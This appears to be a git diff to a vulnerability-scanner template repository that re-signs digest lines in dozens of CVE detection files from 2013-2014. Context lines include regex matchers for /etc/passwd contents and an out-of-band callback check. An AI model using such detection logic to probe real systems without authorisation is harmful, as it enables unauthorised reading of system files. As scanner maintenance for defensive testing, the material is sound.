end of file diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index cb18a72ed0..fa83120e86 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205afc0558c0a5c6f4e156350413787049ba55798abafb3a473caf199566a9d3f1022100dc757c0322a69f872070597ce88eee1b95028c408b4666a3df83e0b817802a6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bbdfec6c6b0dbb822d51f7b8e7f6a4c86e2efa262693738834e332e36ef8760502204be8a707fc209b641303cf6d80b48ff405f2188bbbe6863c1e74febf33d3be50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml index 6f35fd23a7..ac1e693593 100644 --- a/http/cves/2013/CVE-2013-5528.yaml +++ b/http/cves/2013/CVE-2013-5528.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008e02f05197668a2896c4ce3329cfaa33626f88728c4b26081575c062dfa2793b02202da67d420e04a0893e7789fa280484696fae3e87c216e5c8035aa45364e2f2b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c0e7d53dba865e37d9952fc453acbc5285f391c881b20bc06fc527b33852a32b02202a76a2d7f1298c18d287b11f04019664017022b1a52a8090c7c91a65c7417d15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index d40edb7fa6..d699116d62 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100866349d738228669609abe425094cd153a1465586d479ca9fec10db9a7c55c6b022100bb0fae43b502e3c8e6ef60a28d6c47c46d9144a35373d5a29573f694cafb7cb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100adc55796814885836dc00e30dcfbc2bffca64beddde94a38484cbf77c7e2a69f02201229534143e58e528b1007ba516d1d203f2ee687ac98059fa219e7c2fcd600b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index 6ba8a62ed8..3b5549b00c 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cb01e00698300e21d7fd11d10a0bf78683b0c5f5f328e786164354303b69274b022100935646da48b55b5db44efc49b96a770beb700b40087946eb988e934c9fd4cf2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220264be1a688f1ed07351422771be3e6ecb75e3873d3b03533c4a5e91aa0315417022000e6d83628848e87379abb731f13a80757a92700faa93d5d9f0afdd71b08577f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index 9e32b5ae59..8f973b996c 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -53,4 +53,4 @@ http: - type: regex regex: - "root=.*:0:0" -# digest: 4a0a00473045022100af34e7a9486944cdae869b27f5e277ef9ac9ccf9f3694aa8dbbc6231d81abc8602204e21dbc6719c5177611e0f4136f31ff3b46026159d00b25924d61f1f058214b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100be634ff70ef2fd1c3fcff5e4b34413f40bfe6c11f880d919747a9092b2bdaee7022100b8cae4bbee6146170237f5926af5b7a56d23b2d33d2b02687d7a994527c3df55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index 9a614fd207..9d46bc84dc 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100df40bf2354f82b69e8a76d390759c896a2c448d1d2b1cb84bd760147b05a307b022100b74dfb8e99555fef5e06aff38e619f27e81e3dc434c317680b93351c1957cfdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008cc36823b5e4e93dddf02ec0db976554f25f96a05edabd5d9ab0a6c0a84c2cea02200e33950456eda35b16551d8f31dcb431fc224214b12e7031479cf3e08e5b25d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index 2ee3f05df0..e9c5ab52e1 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -64,4 +64,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4a0a00473045022100bea72ccdcaf18fa5328ff124392c4b1d40521fa73d440d3e27d7d0cf1884f00c022040c286187a757d6197352db014b2918f506fa65d89d6fc40e0e226be12e31d8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b5572e6440c1440ca4348d45a4dbc690813602662c69214c802c7d3e9f0e852d022100faa0f0b71eff09e65be8a13cda92a61ab2b55ab4a1cf16ef163f0138c9a7ea96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml index 71406daffd..e04ca17b78 100644 --- a/http/cves/2014/CVE-2014-10037.yaml +++ b/http/cves/2014/CVE-2014-10037.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022045409433be7fe4dffc9d3bfcdade34b30b7d644fbb543aa4ced8a3b0e9075a94022100b697303a0592ced1eb79a26f42db2290e48c6f95bde12e36dfd1154a9c3507a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a103694fdcbf2f102dc42032e94c8989812711ced9c87af484b0f5edacf2df6e02201c68124b9e3a0ab8816d933f907939508eae1a36fc2c04cef266a14714b443b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index 913c9a7b0b..ddb424de4c 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ec1ac8dd4ecf97532dc7d81827b73f01099fd3e1f104abcf31d5e1460d1f50d4022100b97d60ac30948ae48df5afdbba9358802b1be0d6ad69e6e497386080453a1da4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220015c491d44159aee17568548bdba4a707795a8e1fbf2e0c27f369a72c9ee650e022006cc6190ccbee7182363964342c43cfc344786f74608ccfe0c023db92aa03b2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index d2f6efa0ff..e9a03a7310 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a56607c8d1ec7cfd4719d48d9c7fa91e25869e904e929295fb180cd1ba872160022100c914c6b4fcd31ed17d817e7db1d5e08b6fddf7843b00c3275d66e27f480e4a37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210096d3276efa210d93ad21d863b9a7920500fd6fdeb3c4ae113eb18c0d49ebfd9e02206997e38a6584c6e51034e567e22b0731a44edd97b6dc0ce063ef66a0bf8e2abb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index 52bbb53822..98b13cf8f4 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -40,4 +40,4 @@ http: - type: regex regex: - "root:[x*]:0:0:" -# digest: 4b0a00483046022100e0c790e1cbbd16a33270523f27a14fcfe82c2f99b9cb6d04774121f8f44cccad022100b328c3e67f5f85bd158b7701623a9ec68f2aed71f07a280422f15db73aaad1c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206afcafa0b746357085824a28a0484337e9fad686038d443791a290bf363c724a02206c562ed48c070cc8ec2cdbc7ac91c4b7e1a574250c85405972f88ca75f084da6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index 0c21d32a39..2bda91ba84 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203921743780724eb52c7bb0eb87f3d059097d2031b14f0ff098024e481f46880d022100a81e349caaee574d24461d7caf9a93dd9689fa550db17f0cb90b75c1d8e579ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d40ac692cf551b763b5f0e29f2e352828588dadf8db4bbfbad21911515a7350402210094448d226c00d54190c5a3b58aa8cea541f140b207b86e8290347b9bd43d6ae6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index 2240edb4a3..6535aeb76c 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202c73948411560103b8f5c49014a2d1fff0ed14ddb5d4496f5cf0386ed7257d0e02206eefceed30f5e37d37d7999b4b123ecdfd39fb3cdf636ce94634a393478d6e25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206b701810205eb83914101f719ac81527d7aa48223b869460448a96636e3047a5022055384dd852dd7a54cc88e1c17a8a632f3ed8077b5c52d3fbf6c327cdd88da2ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index 7db3fda324..cf47f88ca2 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022026d2b631fa942f9ee77f39d73bfdb3d19e300d528de9d66baa325b64e2577de0022023564b7c13017538b414f940c6f7292a043ec7a7398b7a13991edaca60bd9daa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fd4be543b9ab33d49c3048d4e230fde1b4c30542ea79341622598b899dc80261022100e607fe14a3abee986183ef63d8b8783388c2ee25c84c9195398f2e9a51fd918f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index 8742cdedd6..d90a7f2667 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -71,4 +71,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b8ca32574dd1fadd9b74d9637ead80fe58001ea1f88c106c2bfdd3f56500029a022051065022f16e3bc022eb441be88bfcd018ff0fd07f36d969a9d67853867fc978:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210081546a605643fd4987d5847a6d7d2629000f4601e324004bdceda597126c7d6002207bbcf91cf5da2f49b0a005f0ec1c6cb38485c05b7e27ddc5e12ce8e5ef47bbec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 10d6d458ab..412f06d9b2 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -44,4 +44,4 @@ http: part: interactsh_protocol words: - "http" -# digest: 4a0a0047304502204b3de4b1566a99da648abc07da3b94ebb1860817b84793793d316480d01c7603022100a510f7edb5ed03f87310a9adebb01d4093ee3c3ce11da529ebe95d058998c325:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009c43a03330495cd46b8a3b28ffdb35a60320894973bc3df000972d19ef0a9c2702203c79673ca76ff0b43dfb0f9619aca4099bf63923196ed6b1ba04bae0ea9ae3f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml index 2083c44bcf..0c58e78f74 100644 --- a/http/cves/2014/CVE-2014-3704.yaml +++ b/http/cves/2014/CVE-2014-3704.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022019ad60102b0034cd9c4d9e39c2d9c0c3c811fc44980d37c077d538b6994da157022100ed831a5b94e4b5149514216eb9d04f4830ebd68ad61fde769efb3d379b4b80f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022028c26a08ea48b349ec3c31843cc2923469b047857c7318ae50f390f98814d7e202210080a3c399d3cb19f405945d7567e34f5d23fc4d68371ce22291c02c879979e6e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index 648f944f74..5becf7845e 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ad1ca8124c95e2703cbb3cba50f3915085260371306caf5a373714b7a86f7b7c02200c1bc9db87baee85222934f05a0ec6eed0bdc9ae6370d1f5052eaa16ea09f85c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220758c11973380165812365cc6992d76a890166a92ab6477180a8a870898bc4a1602207f11d33bdef9bc6ddf130ec5d15f0acc89a391794d2158d43a3b1bb733904087:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index 580968edfc..eebec0ea74 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203a40b5fed795b018d009f79227d028b7ed18bab2a342bd3510ecb3f147227e1e02205fefdc746fb4b81255fe35e0b17becc7d8b5d01c9e8798116d55c26056552a67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210096fd55623585f1e93af561d441b2910e1eb08021a15e9c1752173156f1ae74a7022020f4f3cf49fed20da1078da2893e02b82128886244012a09c08c051e44f8f775:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index 9ce452833c..70b415935b 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202f239af02dc3d7a82f42336509f9bfa2152d16e586f60ef223df03ac864cb3f5022100a83dd297b3d178a07579b11715ac2b258ef079b469c99a5399a23c3513c26eb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207472ecbd910ba4e358ae4fca9876757907cf857e7f198bf7a08b4dae8e6df9c0022100d87ac44682cb27022d76c24e6b46319d6eab2af75344862238f5545de2d08a03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index 0e85f8cfe3..3944538a6a 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b748ec3f080c43508a6e4b86ccae498e26c3614f2f06acc017d568fb99cdfb8402206569d13cb86a37da3dfa4744e75680fe26e2dd70d3391c8bf1488d20bd54022d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210096c23039e7d4629d35986df9dc4e9a368965b07213d0bee68c0c14d4cb93214a0220134f4fcb7bb9b710028b8318b240d19b57bb7f2a9cf4dc459b9708f57fb2ec81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index 112f76d089..e6d4b98302 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220580487d990fbf72c8ad3e2af7c2ae2b1d78dd55f71719677cc110f2130109a6c0221008209a0edafca0fb9da9ecb63df77fb96399a3c7328cc83cb7169a6ac62fc13c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220276b0d74351e8bee7b857e3bba8764f464540320768a6852e5e8232336a7a6ab02210099cbe55e439b72b82477933f1a2320a8209df46fac44185407b8b25f37ea4c87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index 54c15c54f9..408a85f891 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210094c57de15f97fca4490843b947b7b690e1aa66fd6313ae1fc8efb8d3dda0e38102210099a8ad854656ce1b02f2890a1a3817915ef09aa5545cd42c952391d7304c75ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022074ef08a44b76ce551a9386f5ff975e103599d2c7e8a6528431edae29598e9890022100887c7585dc450cad08b10d4a79b38d425dadee7137750fa48163a36ec108c193:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index c9150b717f..1ae7da22ae 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220078759a06ea361276eb0cfd93bdd686cc6a0d4efa87b282c90531a3f9ac199e402204e90184620d595a421ed934c84affd49e89d27945d56eeb33bdd981da2c147fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b6bf3ba110677b97c31df4f049c95756da70baaf4ead2086753135dd7f96019302204ae78332805677df64937801398122ba0a3d415bcf13143484dc5b2bf94d48bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index cc17372715..fc24eadfe3 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220674dc3985feafe800dab520f51e8b6a033ee9f73f3b00c39b64ad2e95577664b022022ff4f244837aa3f3778ec97181d38f45697688f3f763adf29b40ae0aa412080:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022031da20cd27760970d90ab168edbe72b91db7b72bf55a073e0ba78a01f5672f8d02206feb4e1b083597c5b57dde4291739e7a6e7446f36e4a462a4b625878c091e990:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index 042456c89e..23039ebd11 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022011cf10d2dca5ad1bfbafb9189c4e9e94a4ff5251092564acfc7eb9be066a59a402201ba84244ed93964ca7562d9622b1199d64197ec0e2ca3e9f2718588a8e0c2bdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d05352aa926f9b51b109278b16dbc2067a3fd55d8ad6dc6beb35e8e7ab639ac102210088db70a59225c25caf2c0869f56f26de685847433f490343d1dc5517caf314d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index 9d5876f6dd..67f38f288c 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022042aa2ddd1022544d8185c099e43d84553656bb11fbaeb242bd651b484c72205202203f36ad98e74813720a2296cbd40314a62cbd6bf9a035af5f72212da73f512846:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022058912b7a91a559aabc5d5e01cbcf10519e68ce107e6a6a6ff4daa432c281040a02204a0c4c80cd4666fd26ffef9d02c3ab8aa58c1ddf4e63ec3846814f195b702ff6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index 6b43931296..f2be82ed5c 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c2cdd0c4284e65cb0b0317de9d6aa5cb72bea04fee1309a4dfd6fde82441339102205249f406a594cff475a01cfa3a67801862401e1cfc7040b7237200c3e67bc1cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a8e839452229347ad301c314e16235be06697305d75b065ee383845575e821c0022100db642fa9c60dd330022627ad98f8b3f51290d80cb682b92ba659b5ad4dd650a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index 6b037da9d6..5fa234e889 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100939d2492f177511e28f9ca4f04b091c26b2840e2752c100c18e5f7607e0e99690220291f5aeece7127eb31b4fe976f62f4f111784d098337e2a3199815b06d4bfb76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202bd61fb62a2f1dde05c3e9934f01fd771ced959bedece463664ded701e41dca4022100e108b986362345ddefa63fe11fde78305955e3ff281d3948babe130f114b4289:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index 1d39e1c854..9117a691ad 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -55,4 +55,4 @@ http: group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' -# digest: 4b0a00483046022100e2e3a29c5c8bc10e79128f4312f2bab1aaf968ad6df5cec5e083f699ffc7db2c022100d40f450a35bc1660b8834509073001ab8669c8f3fc898ef47a37729c3209c692:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210081309d368ecb9975eaa151391ebd42599be7e769ae8fcae811e12ff3e8a2a22f022100c097567c3f212ea44b2f626eff180dbc0627a92ae083a0e0479c3e0c9da333f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index 26f1b520b6..7fc2181fe2 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205e081b249fdecf9eb227be78bafd317b0423a0967e6b7024fead0d8b94d477140220527f9511cf4a42bd722a8541b9eb53b7a6b0f6adc53e1581588e5f137d3e9964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d8f0c15d5bf7de3fee0309995c62997daed69fd92ed8eae89bbe72a51bee1bf202207042f8477301cf319dfdeb85861a20f7a4c67f310cd42ae90fd30db6aca69e37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index 68b9b06ea2..77ae647d62 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c76d479ef7be8d7cb3a49a980c9380d6f85db4eef26ba91d6e8e206f4025c7d9022100ba26dd2e98682b2131b4a893b2e62a027dc2bd72e461ab2794d5ad82fd515657:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eb47a1fcca080b338d3b8fa863f04d23b857348d245b524691f54e5e8be06c4202202122d4f05818c448ca6fad9e5890125551bcfc2d41f6a9ea52f6c6a3e0f0fc54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 43fedebbb6..c997583915 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bcf488a5ee22f771e6cde4fc5c288d534d32f4d6d9bb07584cff635451995606022100b9644182411ee85745c3a47c7e52cc85e8e4af74fa57d03901bfa8a48e8ac8d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e20a3762cd7932a77881d1894be6de798e98de41d94f5eab1e3db78e0442f7000220059b1a127ddc5dabe34e339fe6b7ffcc79979147c77608e4bc16552d50146c07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index 7956563b46..3dee112635 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009347b996d3b96812928efff46fc86e2f49cadcd9ea27ca22fbf7acf421551025022100845b99770e2a0a23ab42bd7d8eec7ae2704b0a92652746e206d0d73c889ea61c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201509283f5457a19de0b50cb144ed1f257b976a77436500a942b8c2fc8dd9dd5602203cefb3610301168d9049ceb4c6699aec8576cedce3c1ae24fa92bba7dc2ab012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index a50eacabbf..1ca8aa5953 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207ba5d391f4bc4249d227d1eab814430eeac95aaabb62b0df76e35601de8d053b02202dd809b088914d79c49e26bed81ad3831b925e9d2760750d768b91a0cd548979:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b4b9c0e418cf4fb07e03e2a2fa03c505cd4fac199d21942dea89f1e6a9a7bdf2022031660ae016d4ac8dff37d2df9f3b29030cb79da71d01999cb2e5faf14cbe35f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index 6e8fa6115c..86234f0568 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205980eb0331cb2cbaa25a754343fd227926af2349658a6bd3e31e9e5dd63266f4022100976d91d5ef4ffb839cf575e6c8060b935352dbaec7e85339fc179b984311b0e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204f4cb2656ddaea9263e975325a921ee711e06843d1266a37ba6c289db77a543202207152fe01da6c017a73a933e80d84d9a7b889423ed3b5f30cae04e65774007c19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index 2ef9a8aa90..4bf5a0fdd1 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cee757ee0d7654311ad8ab53b1c6efc3e794cc3d407b696f987bd0ac6e4217100221008943b9d8ec3e3312f09d975cd64ca4c6ca5ad220b6feb604206990429aefcefa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f662c7423ccc4602f4e03453a6a83b31b602ec03accf90d24eac66106c1a4905022100edcd2d99625b15c9c329cc6e8c437a0edce406cbf4273f26476d7c51813c9e62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff 